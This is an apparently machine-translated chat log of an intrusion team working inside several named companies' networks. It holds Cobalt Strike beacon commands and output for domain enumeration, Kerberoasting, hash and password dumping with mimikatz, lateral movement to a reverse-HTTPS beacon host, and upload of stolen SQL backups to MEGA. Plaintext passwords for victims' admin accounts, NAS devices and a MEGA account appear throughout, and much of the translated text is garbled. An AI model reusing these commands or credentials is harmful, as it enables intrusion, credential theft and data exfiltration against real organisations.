so yesterday and today? yeah, yesterday. not much sleep. I don't remember what happened three days ago.
I signed up uni yesterday, yesterday
hmm, maybe I'm already confused, uni, it was yesterday?
gave you an individual problem on the VPN, like, which then @user7 left, strong strong and so on)
you said that the lab, I remember the day before yesterday I asked you to work on the net
finished about 10 minutes ago. Do not count in hours. I think since yesterday, wrote to you.
how much time were you busy with this task?
Finished with webmords, doesn't take much off found: 1 ushi (no creeds) 1 us (no kreds) iLO 4 ProLiant iLO 54 ProLiant the last two things have not figured out what they are, and no Credits iLO 4 ProLiant 54 ProLiant not yet figured out what they are, well, there are no Credits main.crispregional.org ``` also looking for hints on the backups in the vg and the cloudswrite at the same time, that on the tasks of all, let's move on to the main tasks thank you tell me that he has 10 minutes to contact the boss promptly call pliz @ot let him answer bosu and here we are all trying to make sense of this situation if not then it turns out that @ot himself checked, none of us have checked so, aware of this kitchen were only @ot and @user3 no) and you sent them to check?what's the problem with the tests? we don't know about it, only @ot does. ask the others about the tests - @ot tests - I don't know lab - @ot and @user3 the last one is closed, @user3 was busy configuring it so in order, who did the interviews, tests, labs maybe someone will have problems depending on your answers)okay, never mind, what do you mean by that? and i also talk about tests and labs we talk about the tests and the interviews specifically labs i mean what works with it, from what i observe, @user3 and tests who checked?@ot who conducted the interviews? so? so she rather under the direction of @user3 over which @user3 still works eeetu labaa)ot2 is it who you know about the lab, tests and other things under the direction of @ot? distracted yet? then they immediately 1 dk and picked up the same pdkvot 1 dktakta all ok? List of DCs in Domain \\WDC1 (PDC) ``I did `shell nltest /dclist` without `:```` beacon> shell nltest /dclist: [*] Tasked beacon to run: nltest /dclist: [+] host called home, sent: 46 bytes [+] received output: Get list of DCs in domain '' from '\\WWDC1.waterway.com'. You don't have access to DsBind to (\\WWDC1.waterway.com) (Trying NetServerEnum). 
List of DCs in Domain \\WDC1 (PDC) The command completed successfully ``shell nltest /dclist:```` beacon> shell net accounts [*] Tasked beacon to run: net accounts [+] host called home, sent: 43 bytes [+] received output: Force user logoff how long after time expires?: Never Minimum password age (days): 1 Maximum password age (days): 90 Minimum password length: 6 Length of password history maintained: 10 Lockout threshold: 15 Lockout duration (minutes): 5 Lockout observation window (minutes): 5 Computer role: WORKSTATION The command completed successfully. ``nltest output beacon> net domain waterway.com beacon> net domain_controllers Domain Controllers: [-] Error: 0 beacon> shell nltest /dclist:waterway.com Get list of DCs in domain 'waterway.com' from '\\\WWDC1.waterway.com'. Cannot DsBind to waterway.com (\\WWDC1.waterway.com).Status = 1722 0x6ba RPC_SERVER_UNAVAILABLE I_NetGetDCList failed: Status = 6118 0x17e6 ERROR_NO_BROWSER_SERVERS_FOUND beacon> shell net accounts /dom The request will be processed at a domain controller for domain waterway.com. System error 5 has occurred. Access is denied. found ESXi, no credits yet checked all my DA's with sniper - they are sitting on servers, in chrome only one had password without username from unopened snout Checking of scanned interfaces is in process. sniper check all sysadmins and i.t. guys in the process I have a couple of sessions in the slipway, the water I have not seen nimble here, hashes are different, but not valid nimble is dead? all empty? not even hashes are different? 6 Computers where he was with the rights pulled and in them for now and stay. la was you did not have YES? hashes gave tl2 so far nothing interesting, other than what I wrote in the conf, did not findKred still not found, run the invey and caught some interesting information - the assumption that previously found seven in the yr and not in the domain looks reasonable, because found several other similar compounds. 
Scan the subnets to 445 443 22 80. Search the files on the computers where you have access to do not forget the cloud solutions. main.crispregional.org ``` There is a sphere, av, backups Looking for backups in the groups in `CORP.TELEVISA.COM.MX` I`ve jumped into `CORPSFECRT04` there is nothing on the creeds, now I'll go further untwisted Write down the status of work to get there. like any creeds fit there, but only as a normal polozaki maybe something like that : //www.zoller.info/en/products/tool-management/storage-systems/keeper) and what the drill can not kill? yeah hz. they sell weapons, and these drills assumption : //www.zoller.info/en/home?r=1``` 10.0.0.24 0EA78803 [Win Embedded Standard 7601 SP 1] Probably because it's some kind of cut-up sevens but you need prufy as a variant - that's the title of the crossover.com looking for crescendos with the rights. While I was looking for found ``. (platform: 500 version: 6.1 name: 0EA78803 domain: ZOLLER) ``and now looking for confirmation of a second domain, who works with it? access and other stuff, and looking for external, internal storage, and the quality of the locale itself, we'll give up on that about creating backups looking for backups, auth, then listings skul, mail, filescredits only no backups found#ballymoregroup-com check the web muzzles that naskanii naskanii write what are you doing? in another) push @user7 into the confab to see where everyone is at? hello:space_invader:everyone say goodbye until tomorrow it is mandatory items + cloud check backups in vorkgroups tomorrow will close a couple of networks and tomorrow by 6 pm will finalize `benihana.com starting user is neutered, kerbs are removed, hell is removed, ShareFinder is dropped `ballymoregroup.com found 2 nasa, one dead 2 backup servers found, listings made 2 exch of hell not pinging `Ping request could not find host` pinging whines in the process LA starter user on several machines. Went everywhere took off browsers, hashdump and mimic. 
From all of this found two different hashes YES, but apparently old. No Kerbs - writes something like ``[X] No users found to Kerberoast! `````` main.crispregional.org ``` What's left: backups to find, optionally AV tomorrow by 4 I think half an hour more, what are we up to today? ``` main.crispregional.org 10.1.20.213 SYSTEM * PROVATIONTEST ``that's what kind of silent excitermelanu and all and alive so I keeled it a long time ago better spawn it? why should it die in the first place it won't die do a better spawn first do a spawn kill the session will die psinject 4728 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt ````CheckShareAccess` ? ERROR: Invoke-ShareFinder : A parameter cannot be found that matches parameter name 'checkaccess'. ``where is the -checkaccess flag wev beacon> psinject 4540 x64 Invoke-ShareFinder I also wondered if it shows access balls, not just enum balls? ah, it's for that message) yeah, I don't know)) I thought roll call is to whom and where?sccy.com it turns out...no big deal, it turns out? not a wrong password? it says access denied it if you're talking about the sharfinder output there above look it up, access denied they have a lockout after 5 failed, i think how not to break it with the admin-not yet out of the point? beacon> shell MEGAclient.exe put -q --ignore-quota-warn F:\SQLBackup\*.bak [*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn F:\SQLBackup\*.bak [+] host called home, sent: 91 bytes [+] received output: [API:err: 23:56:12] Unable to open local path: \\?\F:\SQLBackup\*.bak beacon> shell MEGAclient.exe put -q --ignore-quota-warn \\\wwsql2\F$\SQLBackup\*.bak [*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn \\\wwsql2\\F$\SQLBackup\*.bak [+] host called home, sent: 100 bytes [+] received output: [API:err: 23:56:38] Unable to open local path: \\?\\\wwsql2\F$\SQLBackup\*.bak ``Will it work?`` That's what I mean. 
MEGAclient.exe put -q --ignore-quota-warn *.bak No, it's not like all the backups will fit in there without archiving, but in MEGA you can put *hm in the filename ztclmgplmwfqmcjqfn@wqcefp.com 745jkiJIGSFjer67 ``` I'll upload it here. `QfvqBgx767v14bn6c0JlKw` but you noticed it in general in the intranet they often work by looking at the keyword PDI_backup_2021_01_10_053001_4017258.bak Intranet_backup_2021_01_10_053001_3704801.bak ManagementInfo_backup_2021_01_10_053001_3861023.bak Development_backup_2021_01_10_053001_3392249.bak Financial_backup_2021_01_10_053001_3548530.bak 2 GB 28,398,080 CCC_backup_2021_01_10_053001_3079732.bak 28 meters``. beacon> shell dir F:\SQLBackup [*] Tasked beacon to run: dir F:\SQLBackup [+] host called home, sent: 47 bytes [+] received output: Volume in drive F is Data Volume Serial Number is 0E12-2B9D Directory of F:\SQLBackup
35 File(s) 216,430,061,056 bytes 2 Dir(s) 787,610,132,480 bytes free ``Then pick one of your choice from the list above. Won`t you get burnt again? I`d take them.
WWSQL.waterway.com CCC 15549 CCCDenver 10 WWSQL2.waterway.com name -------------------------------------------------------------------------------------------------------------------------------- ----------- Analysis 824 datawarehouse 12105 development 620 DRB 24028 Financial 1676 Payroll 2633 POSInfo 1272 PDIPRODSQL.waterway.com name -------------------------------------------------------------------------------------------------------------------------------- ----------- PDICompany_1137_01 43320 `` these backups, what databases to unload? ladies, what are we talking about? with databases @tl1 and what is the result Financial Development these are interesting. Which ones to export and upload? there are no listings backup agatak there's even a prefix old, they were rubbed and that's it, why are we stopping at it as much as I have encountered, there's an anchorable until you find a subnet in which the loss > 0% there also an anchorable from other subnets pinged not, it means not pinged it rather 100% loss than anchor ahahahaha it's like @user7 had 40 servers on hell, but alive 70 is like 15 out of 10 I did shell netstat -abn and look on what port processes sqlservr, sqlwriter are running on and there's just no pings for me over 100% loss d well here are two that aren't pinged just with the prefix old and the other two with closed ports `Destination host unreachable. Teemo[WWDC2]SYSTEM */628|2021Jan15 02:00:34> shell ping WWSQLOLD -n 1 [*] Tasked beacon to run: ping WWSQLOLD -n 1 [+] host called home, sent: 49 bytes [+] received output: Pinging WWSQLOLD.waterway.com [192.168.0.37] with 32 bytes of data: Reply from 192.168.0.222: Destination host unreachable.
Ping statistics for 192.168.0.37: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Teemo[WWDC2]SYSTEM */628|2021Jan15 02:01:03> shell ping WWSQL2Old -n 1 [*] Tasked beacon to run: ping WWSQL2Old -n 1 [+] host called home, sent: 50 bytes [+] received output: Pinging WWSQL2Old.waterway.com [192.168.0.83] with 32 bytes of data: Reply from 192.168.0.222: Destination host unreachable. Ping statistics for 192.168.0.83: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), `````` Teemo[WWDC2]SYSTEM */628|2021Jan15 01:59:00> shell ping PDITESTSQL -n 1 [*] Tasked beacon to run: ping PDITESTSQL -n 1 [+] host called home, sent: 51 bytes [+] received output: Pinging PDITESTSQL.waterway.com [192.168.0.127] with 32 bytes of data: Reply from 192.168.0.127: bytes=32 time=1ms TTL=128 Ping statistics for 192.168.0.127: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 1ms, Maximum = 1ms, Average = 1ms Teemo[WWDC2]SYSTEM */628|2021Jan15 01:59:21> shell ping wwsql02 -n 1 [*] Tasked beacon to run: ping wwsql02 -n 1 [+] host called home, sent: 48 bytes [+] received output: Pinging wwsql02.waterway.com [192.168.0.59] with 32 bytes of data: Reply from 192.168.0.59: bytes=32 time<1ms TTL=64 Ping statistics for 192.168.0.59: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms are they not pinging? haven't you tried those from other segments? or those ports are closed?) and on these and do not get in without smb and rdps other network segments? yes, i.e. the servers can not go to? 
@user8 how to find a skull server two off and two (PDITESTSQL,wwsql02) do not see anything, no ports 1433,445,3389,139 `````` ``@user3@user9 ``` WWSQL.waterway.com WWSQL2.waterway.com WWSQLOLD.waterway.com WWSQL2Old.waterway.com WWsql02.waterway.com PDIPRODSQL.waterway.com PDITESTSQL.waterway.com ``would like + listings where? take away there is a pst that is 1.png and a 6 gig pst of some itishpost still a couple of pumped out all you got ready? ok, i'll yank the cc_data.mdf it would be nice to pick up their backups? what's not ready? hello):space_invader:day you're all set for tomorrow's slip and everything as usual by 11pm see everything else, mine is no longer fit for me? hello, everyone, hello dn:CN=PANAVISION,CN=System,DC=panavision,DC=com >whenCreated:2005/09/14-17:51:44 Mountain Daylight Time >name: PANAVISION >securityIdentifier: S-1-5-21-202912000-196093339-1136263860 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: PANAVISION >trustType: 1 [Downlevel(1) >trustAttributes: 4 [Quarantined-Domain(4)] ``a bh withdrew.`` fuck i don't know...suddenly my lock aca was heard imperesnimu traststranimu how i then removed bh visibly ldap queries are forbidden...weird it should work Using server: AUS-DCON-01.ap.panavision.com:3268 Directory: Windows Server 2012 R2
10 Objects returned ``Well, I mean not in quarantine? beacon> shell adfind.exe -b DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt [*] Tasked beacon to run: adfind.exe -b DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt [+] host called home, sent: 109 bytes [+] received output: AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral beacon> shell adfind.exe -b DC=PANAVISION -f "(objectcategory=person)" > ad_users.txt [*] Tasked beacon to run: adfind.exe -b DC=PANAVISION -f "(objectcategory=person)" > ad_users.txt [+] host called home, sent: 102 bytes [+] received output: AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral beacon> shell adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt [*] Tasked beacon to run: adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt [+] host called home, sent:
115 bytes [+] received output: AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral `````` >name: panavision.com >name: PANAVISION >name: eu.panavision.com >name: sa.panavision.com >name: na.panavision.com >name: ap.panavision.com >name: LEEFILTERS.UK ``Certain domain is in the trust? I think I got it right...I'm writing the parameter wrong? beacon> shell adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt [*] Tasked beacon to run: adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt [+] host called home, sent: 115 bytes [+] received output: AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral ``I don't understand what bhs has to do with the trusts? did you rubeustus put on the trusts? i mean this ) and what does this have to do with bhs? i mean kerberostsnaught bhs all the trusts surveyed the domain composition? and you kerberosts trusts? khmg[lolly already acq YES locked))))0 you also threwdanu in the first you went up yes?
the problem in going to the trusts that is the case DEN-DCON-02.na.panavision.com [DS] Site: Denver DEN-DCON-01.na.panavision.com [PDC] [DS] Site: Denver WDH-DCON-02.na.panavision.com [DS] Site: Woodland-Hills The command completed successfully ============================================= PDC Alias name administrators Comment Members can fully administer the computer/domain Members ------------------------------------------------------------------------------- Administrator DEN-DCON-01$ Domain Admins PVRT\Enterprise Admins PVRT\wmi.service ============================================= Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- #yromero adfs.admin Administrator BackupMgr CZambrana_da exponential it.deploy it.inventory jharris_da mpatterson_ea orivera_da PKooiman_da sanadmin SP_Admin SQLAgent windchilladmin yromero_ea pvna\#yromero V@ndals1974 ============================================= ``There's an aha You here?`` I'm going to fucking explain if I start, it's more confusing, it's easier to actually read it.`` TrustDirection is not a power of attorney, read what I threw down http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/ so is basically a two-way power of attorney? http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ why should that affect trustAttributes? how does it affect trustAttributes? its requests are trusted both inbound and outbound >trustDirection: 3 [Inbound(1);Outbound(2)]```` dn:CN=PANAVISION,CN=System,DC=panavision,DC=com >whenCreated:2005/09/14-16:51:44 Pacific Daylight Time >name: PANAVISION >securityIdentifier: S-1-5-21-202912000-196093339-1136263860 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: PANAVISION >trustType: 1 [Downlevel(1) >trustAttributes: 4 [Quarantined-Domain(4)] ``Can you explain this point?
beacon> shell ping -n 1 sa.panavision.com [*] Tasked beacon to run: ping -n 1 sa.panavision.com [+] host called home, sent: 58 bytes [+] received output: Pinging sa.panavision.com [192.168.64.50] with 32 bytes of data: Request timed out. Ping statistics for 192.168.64.50: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), ``And I realized that we have no sa domain migrate to quarantine domain? how to google such questions? in 2 streamsada what did you scan? just range /24 ?too want to work) to the heart ... work, but I do not get up with the office tomorrow))) and you?) yes I am usually here until morninga why do not you sleep? not thick, 2 pcs ? [*] 10.100.7.15:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3w 0d 14h 29m 10s) (guid:{ce3aadf5-49db-4506-983e-b24acd38dfd6}) (authentication domain:PVRT) [+] 10.100.7.15:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-01) (authentication domain:PVRT) [*] 10.100.7.16:445 - Force SMB1 since SMB fingerprint needs native_lm/native_os information [*] 10.100.7.14:139 - Force SMB1 since SMB fingerprint needs native_lm/native_os information [*] 10.100.7.16:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3d 12h 33m 11s) (guid:{1466eec3-53c0-4eb4-af7e-1dabe2584051} (authentication domain:PVRT) [+] 10.100.7.16:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-02) (authentication domain:PVRT) ``certainly they will login under one admin account to use gui, for example, ok, the main thing is to check that all yescrch in hashdump 3941 in ad_user 3954ad users long open now i will count with the number of domain users? the client itself is hung? or session? after hashdump see if cobalstrike is hung) dcsync does not fit into the file ? 
``` you could just do the hashdump on the idea, right? `` C:\WINDOWS\Temp> del eula.dll C:\WINDOWS\Temp\eula.dll Access is denied. C:\WINDOWS\Temp> whoami friver\i3bdr I don't think the skis are going wrong then use ntds utill should be here or not here ? from creds export @tl1 what is the syntax ? dcsync can't get into the file ? it's holding the process can't delete the fucking files 100666/rw-rw-rw- 139680 fil 2020-10-06 23:01:55 +0200 eula.dll 40777/rwxrwxrwx 0 dir 2012-06-25 19:57:03 +0200 hsperfdata_SYSTEM 100666/rw-rw-rw- 22101 fil 2020-10-06 23:37:06 +0200 mimikatz.log ``DK in the cob what? Have you got it up? Have you got it up on the grid on your compa Not understood the question Do you need to get the system up there? OK, that was the original task Da @tl1 let me first jump (run dll) on the DK, take the dsink, then look for a server, there are lots of options now? AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 01:02:30> shell dir \\SOLARWINDS\C$\Users [*] Tasked beacon to run: dir \\SOLARWINDS\C$\Users [+] host called home, sent: 254 bytes [+] received output: Volume in drive \SOLARWINDS\C$ has no label. Volume Serial Number is B6E7-695C Directory of \SOLARWINDS\C$\Users 09/02/2020 02:07 PM . 09/02/2020 02:07 PM .
03/07/2016 10:54 AM .NET v2.0 03/07/2016 10:54 AM .NET v2.0 Classic 03/07/2016 10:54 AM .NET v4.5 03/07/2016 10:54 AM .NET v4.5 Classic 09/28/2015 10:52 AM Administrator 04/29/2020 12:07 AM azure_join@friver.local 03/07/2016 10:54 AM Classic .NET AppPool 09/10/2018 09:26 AM frtech 08/07/2020 11:23 AM KGillisAdmin 06/25/2020 11:14 AM mfinniganadmin 10/30/2018 02:20 PM MsDtsServer120 10/30/2018 05:06 PM MsDtsServer130 07/17/2018 09:52 AM MSSQLFDLauncher 10/30/2018 02:20 PM MSSQLSERVER 10/30/2018 02:20 PM MSSQLServerOLAPService 02/18/2020 10:53 AM pcrusieadmin 06/22/2015 03:10 PM Public 10/30/2018 02:20 PM ReportServer 06/15/2020 10:24 AM rgoinsadmin 10/30/2018 02:21 PM SQLSERVERAGENT 10/30/2018 05:22 PM SQLTELEMETRY 10/30/2018 05:20 PM SSASTELEMETRY 10/30/2018 05:06 PM SSISTELEMETRY130 0 File(s) 0 bytes 25 Dir(s) 43,644,530,688 bytes free ``and the tolist show me C:\users of this server aha ok + what's the dll? coba? ``dn:CN=SOLARWINDS,OU=Servers,OU=Corporate,DC=FRIVER,DC=LOCAL`` this is the server i look for the server dump the hashes))))) finally the toura` `` AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 00:54:55> shell net use X: \SOLARWINDS\C$ /user:FRIVER\i3bdr 7Fv(l7c5h)Pq [*] Tasked beacon to run: net use X: \SOLARWINDS\C$ /user:FRIVER\i3bdr 7Fv(l7c5h)Pq [+] host called home, sent: 280 bytes [+] received output: The command completed successfully. `````` AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 00:51:25> shell net user i3bdr /dom [*] Tasked beacon to run: net user i3bdr /dom [+] host called home, sent: 50 bytes [+] received output: The request will be processed at a domain controller for domain FRIVER.LOCAL.
User name i3bdr Full Name i3brd Backup Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set ?10/?21/?2016 2:34:30 PM Password expires Never Password changeable ?10/??24/?2016 2:34:30 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon ??10/?6/?2020 5:51:26 PM Logon hours allowed All Local Group Memberships Global Group memberships *Deny_Share_access *CitrixVPNAccess *Domain Users *SQL Administrators *Domain Admins *Payroll-SQLAdmins The command completed successfully. ``I'm so fucked up, I won't say it again. AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 00:48:15> jump psexec_psh DIV79-FS-01 https [*] Tasked beacon to run windows/beacon_https/reverse_https (regbest.com:443) on DIV79-FS-01 via Service Control Manager (PSH) [+] host called home, sent: 214277 bytes [-] Could not open service control manager on DIV79-FS-01: 1722 [-] Could not connect to pipe (\DIV79-FS-01\pipe\status_4d6): 53 [+] host called home, sent: 152 bytes \DIV79-FS-01 \pipe_host sent 152 bytes) \Why are we here just for fun)\and check more YES after you take the hashes off the server as far as possible is not critical no processes YES no one has been here for a long time and the server is not a serverKhat? * Username : i3bdr * Domain : FRIVER * Password : 7Fv(l7c5h)Pq ?`opaaa`` Members ------------------------------------------------------------------------------- ADFS adminsolar ayoderadmin azureadmin bhilladmin BlackStratus$ BNelsonAdmin chailadmin CRMadmin cwilsonadmin datacubepro dpawlakadmin FaxAdmin gkoontzadmin gzapataadmin i3bdr jsteffenadmin KGillisAdmin mfinniganadmin MSOL_43139b2cee97 pcrusieadmin rgoinsadmin ScaleService SCCM-01$ sccmadmin sonicwalladmin veeambr vmadmin ``user3 mimic if only that was taken off what else? said that now will remove only that was taken off or only that was taken off? 
this is not an answer) took off the lexabyl or took off? only hashdump the rest was taken off? the car is ancient, do not check the creed`` AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:30:06> shell net use X: \cor-crm-02.friver.local\C$ /user:cor-crm-02\Administrator Shotgun913 [*] Tasked beacon to run: net use X: \cor-crm-02.friver.local\C$ /user:cor-crm-02\Administrator Shotgun913 [+] host called home, sent: 112 bytes [+] received output: System error 384 has occurred. You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack. Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747 ``Now alexei will run the dll and continue the work if it works - I'll send it right away nea (managed to determine the pass from FaxAdmin ?Ok, now I will throw the ad infona citrix under sox - from there we call kmd and draw citra, I wonder where it will lead even auchivmentvektor open `` `` URL : http://citrixweb-01/Citrix/XenApp/auth/login.aspx Username : tkennedy Password : Forest5454# ``+`psinject 7288 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\hashes.txt -append -force -encoding UTF8 ``Why not, let it lie there the point of Invoke-Kerberos ?took+without admincount`execute-assembly Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes.txt```` AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:52:54> shell net group "domain admins" /dom [*] Tasked beacon to run: net group "domain admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain FRIVER.LOCAL. 
Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- ADFS adminsolar ayoderadmin azureadmin bhilladmin BlackStratus$ BNelsonAdmin chailadmin CRMadmin cwilsonadmin datacubepro dpawlakadmin FaxAdmin gkoontzadmin gzapataadmin i3bdr jsteffenadmin KGillisAdmin mfinniganadmin MSOL_43139b2cee97 pcrusieadmin rgoinsadmin ScaleService SCCM-01$ sccmadmin sonicwalladmin veeambr vmadmin The command completed successfully. `````` AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:57:21> shell net group "Enterprise Admins" /dom [*] Tasked beacon to run: net group "Enterprise Admins" /dom [+] host called home, sent: 65 bytes [+] received output: The request will be processed at a domain controller for domain FRIVER.LOCAL. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- pcrusieadmin rgoinsadmin The command completed successfully. `````` AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:58:27> shell net localgroup Administrators [*] Tasked beacon to run: net localgroup Administrators [+] host called home, sent: 60 bytes [+] received output: Alias name Administrators Comment Members ------------------------------------------------------------------------------- Administrator FRIVER\Domain Admins FRIVER/Local Desktop Administrators FRIVER\teledata FRTech The command completed successfully. ``Everything, leave it as it is and just go to lpe and so ona dll delete or leave it ?keep working + not deleted+`C:\Users\tkennedy\AppData\Local\Microsoft\Office` - here the dll `olkexplorer.officeUI.dll` - I'll call it `7 out.7z file.txt file2.txt file3.txt` thank you` 7z ?))See you all tomorrow, thank you all))restart the clientbut it[ ](https://mediaeveryone.com/channel/general?msg=ZF8QdG6YHpW3E5Q5h) that is hanging? 
More precisely teem server, probably hangs after lunch give more sessions@user1 once said that you need time to put the records on modules and vectors in order, before lunch can do this yesThe second command helps first from emeralmatherials.com? Our sessions:hiDo they? 2 with the other2 with one teamaWe're 4 here with the second team yet?Good morning to allGood morningGood morningGood morningGreetings)See you soon) Well, on the 5th at 2 in the office) Thank you)) When all said)) Happy New Year)) Thank you) Likewise, and thanks for bearing all our blunders, with the New Year, all the best and also more bonuses) Thanks) Also happy to work with you @tl2 and the guys in the office, very much from you learned. It was a hard year from all points of view, we went through all sorts of things with you and you have grown a lot since our first meeting, which I am very glad. Especially during the last month you have been working as close as possible and as a team. I am glad we are working together, I hope you will not lose this spirit in the new year. Congratulations to all of you on a happy new year! I wish you happiness, more bonuses, health and a good sleep for the weekend. Thank you all)Very fast and can go away)I will sum up the year in 2 hours) https://wwhq62nas.us2.quickconnect.to/ https://waterway63.us2.quickconnect.to/ ``` ``` Waterway 11915Wnas2179! ``What time?'' Well it's also seen in GeneralWe're coming back on the 5th of the dayI @tl2 said that you came of your own accordThank you all for coming today ``` ``` us: 192.168.0.3 Waterway 11915Wnas2179! ````WATERWAY\blauer 11915Admin2179!
User: mapusatera - IP Address: 192.168.0.164 User: DBunte - IP Address: 192.168.90.2 User: gkeller - IP Address: 192.168.0.162 User: Quser - IP Address: 192.168.13.57 LEVASHENKO-PC: 192.168.0.22 mharper WWSQL: 192.168.0.188 blauer LAB-OFFICE: 192.168.0.161 Administrator ``and on this all-logins and passwords give separate information about tachka adminsladno so my versionda, i think the new version of ff changed the algorithm as i remember he did not give anything other than mosilla sharpweb kazhiz not workada sharpweb also pusilimozila they have noff separately goes edgewise and chomon itself checks only browsers on the chrome engine sharpchrome all browsers did you kste look only chrome?but after the signal head-on that we're back more likely soon to redo everything they probably rolled back and scored their passwords 2-3 duplicates per YES) and as for passwords I would check their mail for starters as a variant daobvezti them keyloggers, or what ...paper to steal they go there through the network anywaywhy? well, we'll have to go to them then, hulino traces in any case is thereavlya not on the network accesses may be on the paper also if you think so http://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_GUI_Administration_Guide_NOS_50x.whz/unm1501525250368.htmlBy the way, they had folders restore - like from programs to restore deleted files. it's just a word that the accesses to the crash site will be fresh and they rolled back quickly after the first one and the grid goes on the second circle just to think about it after such a clear sign that the fight is not over they probably understand if the grid goes on the second circleHueeeeeeeew))) he probably decided to work from home, bastard)and like now burned him Sharphromium removed passwords, removed logopassword, in chrome handheld browsed the history. did you look for traces of nimble? did you read his mail?) the answer was no. 
did you check if he was using nimblebrowser or if he had a ms outlook client?I turned on the rdp on it, is there a car? did not find access to the mail have not looked? there is another option, on the synolodji put passwords blauer, perhaps on the nimbles, too, he too. and the logs that is backed up there, how many admins from nimbla group have you been? there only correspondence with the seller and the correspondence on the setting (dock, I've already thrown) there's also a maximum I followed @user7 found information from the pdf checked for these tags and nimbla looked and saw hostnamenimble) I was at the post of several dudes, there on the subject veeam, backup, pass, sphere, center nothing I searched the mail with a few dudes about veeam, backup, pass, sphere, center blank. at most on the backup came out that i screenshot, about data stolen network hacked, and allThey probably all it department domain admins - not to get up twice)) and maybe in correspondence lit up something interesting he gets here `` `` >displayName: Greg Keller >uSNCreated: 17303 >memberOf: CN=Veeam Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=IT,OU=WW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=ITStaff,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=Office,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=OfficeSQL,OU=SQLGroups,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=OnlyOffice,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com >memberOf: CN=Domain Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com But he's just because he's a developer they have an internal portal, maybe you should still look there no keller is a developer. they have blauer did you remove his access from the outlook? gkeller is 60% sure that this guy has access to the mail there so what about us with the outlook? 
